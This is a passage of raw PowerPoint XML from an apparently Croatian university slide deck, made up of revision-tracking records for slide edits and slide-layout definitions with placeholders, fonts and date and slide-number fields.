          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:54:55.492" v="65" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2268374611" sldId="431"/>
            <ac:spMk id="2" creationId="{A282AF99-82B1-D780-2FCF-B682A15EDD80}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:54:59.252" v="66" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2268374611" sldId="431"/>
            <ac:picMk id="5" creationId="{65ECCA62-1600-44D0-896C-667F8FA83214}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:55:05.015" v="67" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2268374611" sldId="431"/>
            <ac:picMk id="9" creationId="{DAA37F34-0878-41B5-A93D-B31181CD53F3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add setBg">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:57:20.889" v="69"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3734185640" sldId="431"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="635101480" sldId="432"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="635101480" sldId="432"/>
            <ac:spMk id="2" creationId="{3CC5F260-2B47-4AA6-8DC9-19D3EAD7E053}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="635101480" sldId="432"/>
            <ac:spMk id="3" creationId="{92964DB2-7AC0-4891-8499-F961D4C7798F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2314577087" sldId="433"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2314577087" sldId="433"/>
            <ac:spMk id="2" creationId="{CB70FB1F-CEAD-4EE4-A4F4-873506A957F4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2314577087" sldId="433"/>
            <ac:spMk id="3" creationId="{BD86E7A8-FD76-4377-A735-D63B837480BD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:31:04.119" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1974209199" sldId="438"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:31:04.119" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2296408135" sldId="439"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:31:04.119" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2422683716" sldId="440"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:31:04.119" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2415795534" sldId="443"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:31:04.119" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2216818306" sldId="444"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:31:04.119" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2178126704" sldId="445"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:31:04.119" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1266288475" sldId="446"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="186398859" sldId="447"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="186398859" sldId="447"/>
            <ac:spMk id="2" creationId="{B5B092A6-DF89-DCEC-EC37-53E3DA4418AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="186398859" sldId="447"/>
            <ac:spMk id="3" creationId="{9150E8CD-2DCA-59BF-BB58-7E1B22FF5C93}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:51:02.133" v="34" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="350185634" sldId="448"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350185634" sldId="448"/>
            <ac:spMk id="2" creationId="{8F8700D6-E051-25CE-0336-D5F3B07F5F78}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350185634" sldId="448"/>
            <ac:spMk id="3" creationId="{9AA5CFD2-26BB-7195-CAFF-9ABBAE876D40}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:39:35.220" v="8" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350185634" sldId="448"/>
            <ac:spMk id="4" creationId="{AC827B5E-46CE-549D-71FC-E2D5175C34FE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:39:35.220" v="8" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350185634" sldId="448"/>
            <ac:spMk id="5" creationId="{76895943-ADCF-B332-7311-638C1FB520AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:39:35.220" v="8" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350185634" sldId="448"/>
            <ac:spMk id="12" creationId="{2165DE96-8827-49DF-406F-13F12835D5E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:50:58.569" v="32" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350185634" sldId="448"/>
            <ac:picMk id="7" creationId="{9954B9FF-6EDA-B8E2-811C-162EE67924AF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:51:02.133" v="34" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350185634" sldId="448"/>
            <ac:picMk id="9" creationId="{E460A428-A80E-AF47-EAF8-C84B51F583C2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:51:00.429" v="33" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="350185634" sldId="448"/>
            <ac:picMk id="11" creationId="{D8C6F04D-A559-FC12-D445-EE291FC50DAA}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:07.173" v="2"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4065973517" sldId="456"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T08:50:12.021" v="83" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="210456813" sldId="457"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T08:50:12.021" v="83" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="210456813" sldId="457"/>
            <ac:spMk id="2" creationId="{625F32A7-23FF-9571-E0EA-BC81576AAD97}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:52:30.287" v="38" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="210456813" sldId="457"/>
            <ac:spMk id="3" creationId="{0BB79F7C-6BEC-46AE-1414-A4B144C6AE3D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:52:34.767" v="40" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="210456813" sldId="457"/>
            <ac:picMk id="5" creationId="{F5A19FA2-2292-E1C1-2E14-6C042529AF62}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:44:01.391" v="100" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1693446084" sldId="458"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:44:01.391" v="100" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1693446084" sldId="458"/>
            <ac:spMk id="2" creationId="{A62395F7-54C6-00AF-4C7D-06CFB6B4C4A9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:43:41.507" v="98" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1693446084" sldId="458"/>
            <ac:spMk id="3" creationId="{B7B1EE3B-A8DD-B7D6-6E42-27A6F5D3D675}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:44:17.166" v="102" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2914559637" sldId="459"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:44:17.166" v="102" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2914559637" sldId="459"/>
            <ac:spMk id="2" creationId="{DD74D8E0-685A-B4EF-A4E5-DC2419AB6BE8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:42:59.444" v="95" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2914559637" sldId="459"/>
            <ac:spMk id="3" creationId="{CC4C8F0D-B4DB-C127-26A7-DE0A1FC9C189}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:52:14.261" v="114" actId="26606"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2895966170" sldId="460"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:52:14.261" v="114" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2895966170" sldId="460"/>
            <ac:spMk id="2" creationId="{6B25E392-79BE-23FB-1B20-4E5C5F237670}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:52:14.261" v="114" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2895966170" sldId="460"/>
            <ac:spMk id="3" creationId="{FEFD2318-0483-4619-5C32-359DA6DC8ED3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T09:52:14.261" v="114" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2895966170" sldId="460"/>
            <ac:picMk id="2050" creationId="{D878F3A3-1E94-03C6-5626-ED8F79A2F757}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp new">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T10:59:02.208" v="248"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="934577691" sldId="461"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T10:57:24.072" v="247" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="934577691" sldId="461"/>
            <ac:picMk id="1026" creationId="{101E1E1F-7497-812C-6E38-026EC4AB836E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T10:59:02.208" v="248"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="934577691" sldId="461"/>
            <ac:picMk id="1028" creationId="{E7C84424-823D-9C6F-981B-15389E98895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lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placehold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lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FCB2F916-D34E-4334-86D9-B0678CA31AAF}" type="datetimeFigureOut">
              <a:rPr lang="sr-Latn-CS"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.5.2025.</a:t>
            </a:fld>
            <a:endParaRPr lang="hr-HR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placehold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FF34CA59-7C03-4CE2-97AD-9569B1559501}" type="slidenum">
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1918903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mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:extLst/>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mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{49027438-F1DC-471B-8156-E3D72CACDF7B}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:extLst/>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8C24FEF4-62D9-41C3-A3BC-8072D8EEB588}" type="slidenum">
              <a:rPr lang="en-US" altLang="sr-Latn-RS"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3085052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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8C24FEF4-62D9-41C3-A3BC-8072D8EEB588}" type="slidenum">
              <a:rPr lang="en-US" altLang="sr-Latn-RS" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120963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3027866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54149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86952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6679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2661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4174615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B SVEUČILIŠTE - naslovna">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Slika 3" descr="Slika na kojoj se prikazuje grafika, Font, grafički dizajn, tekst&#10;&#10;Opis je automatski generiran">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC5AB3DF-7CBC-3543-882F-9BBE3FC47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1870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45704"/>
            <a:ext cx="6609849"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628650" y="365126"/>
            <a:ext cx="78867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628650" y="1825625"/>
            <a:ext cx="78867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440459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5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80488" y="0"/>
            <a:ext cx="16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3523422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5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80488" y="0"/>
            <a:ext cx="16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1961149"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a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="18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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400"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marL="1142971" indent="-228594">
              <a:defRPr lang="en-US" sz="20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160" indent="-228594">
              <a:defRPr lang="en-US" sz="18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4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="16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8"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1517303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5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80488" y="0"/>
            <a:ext cx="1635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131907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1242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A1425EB-545C-49B4-B245-ABF042305FB0}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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C1898E-E64B-4231-9F3F-E8141FED817B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2811450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B031F6C-332E-44D6-B129-5E849012F135}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/13/2025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5E14C-3B25-4607-8C91-7633452D1246}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2289143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23AA2DE-2FED-4B0B-A2CB-2D9C300C03FF}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
